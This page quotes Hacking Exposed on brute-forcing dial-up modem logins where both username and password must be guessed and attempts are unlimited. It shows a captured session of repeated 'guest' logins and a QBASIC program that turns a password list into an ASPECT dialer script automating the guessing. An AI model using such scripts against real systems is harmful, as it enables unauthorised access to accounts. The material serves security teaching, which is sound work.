Domain3

Brute Force Domain 3: Dual Authentication, Un-Limited Attempts 
(Excerpts from Hacking Exposed written by Stephan Barnes  "M4phr1k")

Our third domain builds off of our first domain, but now since there are two things to be guessing (provided you don’t already know a userid) this process theoretically takes more time to execute than our 1st and 2nddomain examples.  We should also mention that the sensitivity of this 3rd domain and the upcoming 4th domain process can be delicate since there are theoretically more keystrokes being transferred to the target system.    Delicate in that there is more chance for something to go wrong.  The scripts used to build these type of brute force approaches are similar in concept as the ones demonstrated above.  (FIG 6) shows a target and (FIG 7) shows an example QBASIC program to make the ASPECT script. 

(FIG 6)

XX-Jul-XX 09:55:08 91XXX5551234 C: CONNECT 9600/ARQ/V32/LAPM

Username: guest
Password: xxxxxxxx
Username: guest
Password: xxxxxxxx
Username: guest
Password: xxxxxxxx
Username: guest
Password: xxxxxxxx
Username: guest
Password: xxxxxxxx
Username: guest
Password: xxxxxxxx

(goes on unlimited)

(FIG 7)

QBASIC program (called 5551235.BAS)

OPEN "5551235.was" FOR OUTPUT AS #2
OPEN "LIST.txt" FOR INPUT AS #1
PRINT #2, "proc main"
PRINT #2, "dial DATA " + CHR$(34) + "5551235" + CHR$(34)
DO UNTIL EOF(1)
LINE INPUT #1, in$
in$ = LTRIM$(in$) + "^M"
PRINT #2, "waitfor " + CHR$(34) + "Username:" + CHR$(34)
PRINT #2, "transmit " + CHR$(34) + "guest" + CHR$(34)
PRINT #2, "waitfor " + CHR$(34) + "Password:" + CHR$(34)
PRINT #2, "transmit " + CHR$(34) + in$ + CHR$(34)
LOOP
PRINT #2, "endproc"

 

 

Comments